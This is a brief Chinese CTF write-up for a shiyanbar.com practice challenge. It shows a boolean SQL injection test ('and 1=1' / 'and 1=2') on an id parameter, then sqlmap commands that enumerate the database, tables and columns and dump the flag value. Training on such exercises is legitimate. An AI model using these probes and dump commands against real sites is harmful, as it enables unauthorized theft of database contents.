名字叫做看起來比較簡單的一道(sqlmap)

名字叫做看起來比較簡單的一道(sqlmap)

來自專欄 不會開車的廚師不是好黑客

題目地址:www.shiyanbar.com/ctf/33

題目鏈接:ctf5.shiyanbar.com/8/in

點開題目的鏈接得到以下界面:

因為url中有?id=1的字樣,我們此時一下是否存在注入。(用 and 1=1 ,and1=2)

由於返回的結果不同,所以存在注入漏洞。

打開sqlmap,使用語句sqlmap –u shiyanbar.com/8/index? –current-db

可以看到我們找打資料庫,並且他的名字為my_db.

使用 sqlmap –u shiyanbar.com/8/index? –D my_db –table來獲取my_db資料庫中的表。

通過下圖可以看到發現my_db資料庫中的news thiskey 這兩個表。

使用sqlmap –u shiyanbar.com/8/index? D my_db –T thiskey –columns來獲取表thiskey中的列名。

可以看到K0y這個列

使用sqlmap –u shiyanbar.com/8/index? –D my_db –T thiskey –C k0y –dump來獲取其中的值。

得到k0y中的值。

提交其中的值,回答正確。


推薦閱讀:

「安全」對於醫療雲有多重要?
5月第2周業務風控關注 | 央行:嚴禁未經授權認可的APP接入徵信系統
IT防火牆設置
美國國家網路空間安全態勢感知協調機制
三個有趣的脫殼例子

TAG:網路安全 | 黑客Hacker | 信息安全 |